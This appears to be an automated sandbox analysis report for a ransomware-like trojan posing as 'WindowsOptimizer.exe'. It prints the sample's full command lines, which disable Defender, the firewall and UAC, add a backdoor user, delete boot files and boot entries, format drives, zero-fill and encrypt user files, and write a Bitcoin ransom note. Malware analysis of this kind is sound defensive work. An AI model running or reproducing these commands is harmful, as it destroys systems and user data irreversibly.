Malware Analysis Report

2024-11-13 18:05

Sample ID: 241109-1aw26a1rcs
Target: WindowsOptimizer.exe
SHA256: d4682419f76d71b863481d6e17ae0ed0cbbf06581aa2480ed304c66dd9072b5b
Tags: bootkit defense_evasion discovery evasion execution persistence privilege_escalation ransomware trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: d4682419f76d71b863481d6e17ae0ed0cbbf06581aa2480ed304c66dd9072b5b

Threat Level: Known bad

The file WindowsOptimizer.exe was found to be: Known bad.

Malicious Activity Summary

Tags: bootkit defense_evasion discovery evasion execution persistence privilege_escalation ransomware trojan

UAC bypass

Modifies boot configuration data using bcdedit

Disables RegEdit via registry modification

Stops running service(s)

Disables Task Manager via registry modification

Modifies Windows Firewall

Writes to the Master Boot Record (MBR)

Indicator Removal: File Deletion

Enumerates connected drives

Launches sc.exe

Event Triggered Execution: Netsh Helper DLL

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Runs net.exe

Suspicious use of SendNotifyMessage

Modifies registry key

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-11-09 21:27

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-09 21:27
Reported: 2024-11-09 21:58
Platform: win7-20240903-en
Max time kernel: 2s
Max time network: 3s

Command Line

"C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"

Signatures

UAC bypass

Tags: evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A

Modifies boot configuration data using bcdedit

Tags: ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Disables RegEdit via registry modification

Tags: evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A

Disables Task Manager via registry modification

Tags: evasion

Modifies Windows Firewall

Tags: evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\netsh.exe | N/A

Stops running service(s)

Tags: evasion execution

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\X: | C:\Windows\system32\mountvol.exe | N/A
File opened (read-only) | \??\D: | C:\Windows\system32\format.com | N/A
File opened (read-only) | \??\E: | C:\Windows\system32\format.com | N/A

Indicator Removal: File Deletion

Tags: defense_evasion

Writes to the Master Boot Record (MBR)

Tags: bootkit persistence
Description | Indicator | Process | Target
File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | N/A

Launches sc.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\sc.exe | N/A
N/A | N/A | C:\Windows\system32\sc.exe | N/A

Event Triggered Execution: Netsh Helper DLL

Tags: persistence privilege_escalation
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A

System Network Configuration Discovery: Internet Connection Discovery

Tags: discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\fsutil.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A
N/A | N/A | C:\Windows\system32\reg.exe | N/A
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\efsui.exe | N/A
N/A | N/A | C:\Windows\system32\efsui.exe | N/A
N/A | N/A | C:\Windows\system32\efsui.exe | N/A

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\efsui.exe | N/A
N/A | N/A | C:\Windows\system32\efsui.exe | N/A
N/A | N/A | C:\Windows\system32\efsui.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2088 wrote to memory of 1812 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1812 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1812 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1812 wrote to memory of 1772 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1812 wrote to memory of 1772 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1812 wrote to memory of 1772 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2088 wrote to memory of 2564 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2564 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2564 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2564 wrote to memory of 2748 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\netsh.exe
PID 2564 wrote to memory of 2748 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\netsh.exe
PID 2564 wrote to memory of 2748 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\netsh.exe
PID 2088 wrote to memory of 2848 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2848 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2848 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2848 wrote to memory of 2808 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2848 wrote to memory of 2808 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2848 wrote to memory of 2808 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2088 wrote to memory of 2832 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2832 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2832 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2832 wrote to memory of 3004 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 2832 wrote to memory of 3004 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 2832 wrote to memory of 3004 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 2088 wrote to memory of 2760 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2760 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2760 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2760 wrote to memory of 2728 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 2760 wrote to memory of 2728 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 2760 wrote to memory of 2728 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 2088 wrote to memory of 2840 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2840 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2840 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2840 wrote to memory of 2736 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2840 wrote to memory of 2736 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2840 wrote to memory of 2736 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2088 wrote to memory of 2264 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2264 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2264 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2264 wrote to memory of 2876 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2264 wrote to memory of 2876 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2264 wrote to memory of 2876 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2088 wrote to memory of 2720 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2720 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2720 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2720 wrote to memory of 2764 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2720 wrote to memory of 2764 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2720 wrote to memory of 2764 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2088 wrote to memory of 2636 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2636 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2636 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2636 wrote to memory of 2856 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2636 wrote to memory of 2856 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2636 wrote to memory of 2856 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2088 wrote to memory of 2892 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2892 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2892 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2892 wrote to memory of 2944 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 2892 wrote to memory of 2944 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 2892 wrote to memory of 2944 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 2088 wrote to memory of 1576 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1576 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1576 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1576 wrote to memory of 2740 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe

Processes

C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe

"C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config wuauserv start=disabled

C:\Windows\system32\sc.exe

sc config wuauserv start=disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net user TrojanUser0 ComplexPass123! /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Desktop

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Desktop" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\*.dll

C:\Windows\system32\net.exe

net user TrojanUser0 ComplexPass123! /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q C:\bootmgr

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AssertNew.cmd"

C:\Windows\system32\cipher.exe

cipher /E /A /S:C:\Users\Admin\Desktop

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user TrojanUser0 ComplexPass123! /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /delete {bootmgr} /f

C:\Windows\system32\bcdedit.exe

bcdedit /delete {bootmgr} /f

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\BlockConfirm.mp4"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CheckpointCopy.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /delete {default} /f

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteMove.cab"

C:\Windows\system32\bcdedit.exe

bcdedit /delete {default} /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c mountvol X: /s

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteUpdate.mpe"

C:\Windows\system32\mountvol.exe

mountvol X: /s

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q X:\EFI\Microsoft\Boot\*.*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c mountvol X: /d

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ConvertApprove.wvx"

C:\Windows\system32\mountvol.exe

mountvol X: /d

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ConvertToStep.js"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c format C: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CopyShow.xlsx"

C:\Windows\system32\format.com

format C: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DebugShow.ps1"

C:\Windows\system32\efsui.exe

efsui.exe /efs /keybackup

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DisableClose.docx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c format D: /fs:raw /q /y

C:\Windows\system32\format.com

format D: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\EnterComplete.asx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c format E: /fs:raw /q /y

C:\Windows\system32\format.com

format E: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ExportResume.au"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /delete {current} /f

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ImportConfirm.doc"

C:\Windows\system32\bcdedit.exe

bcdedit /delete {current} /f

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ImportExport.pot"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\InstallDisconnect.DVR-MS"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinOut.cfg"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\LimitAdd.xml"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\MergeProtect.mov"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PingConvertTo.mp4v"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PopUnregister.potm"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RedoClose.xlsx"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RenameSync.docx"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SelectInitialize.mov"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SendRevoke.vsx"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SetClose.AAC"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartUninstall.bmp"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StepHide.mpeg"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StopJoin.lock"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StopRedo.vdx"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SuspendDebug.asp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2024-11-09 21:27
Reported: 2024-11-09 21:28
Platform: win10v2004-20241007-en
Max time kernel: 2s
Max time network: 3s

Command Line

"C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"

Signatures

UAC bypass

Tags: evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A

Modifies boot configuration data using bcdedit

Tags: ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Disables RegEdit via registry modification

Tags: evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A

Disables Task Manager via registry modification

Tags: evasion

Modifies Windows Firewall

Tags: evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\netsh.exe | N/A

Stops running service(s)

Tags: evasion execution

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\D: | C:\Windows\system32\format.com | N/A
File opened (read-only) | \??\E: | C:\Windows\system32\format.com | N/A
File opened (read-only) | \??\X: | C:\Windows\system32\mountvol.exe | N/A

Indicator Removal: File Deletion

Tags: defense_evasion

Writes to the Master Boot Record (MBR)

Tags: bootkit persistence
Description | Indicator | Process | Target
File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | N/A

Launches sc.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\sc.exe | N/A
N/A | N/A | C:\Windows\system32\sc.exe | N/A

Event Triggered Execution: Netsh Helper DLL

Tags: persistence privilege_escalation
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A
N/A | N/A | C:\Windows\system32\reg.exe | N/A
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Runs net.exe

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\efsui.exe | N/A
N/A | N/A | C:\Windows\system32\efsui.exe | N/A
N/A | N/A | C:\Windows\system32\efsui.exe | N/A

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\efsui.exe | N/A
N/A | N/A | C:\Windows\system32\efsui.exe | N/A
N/A | N/A | C:\Windows\system32\efsui.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1480 wrote to memory of 1204 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 1204 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1204 wrote to memory of 4288 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1204 wrote to memory of 4288 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1480 wrote to memory of 4844 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 4844 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1172 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\netsh.exe
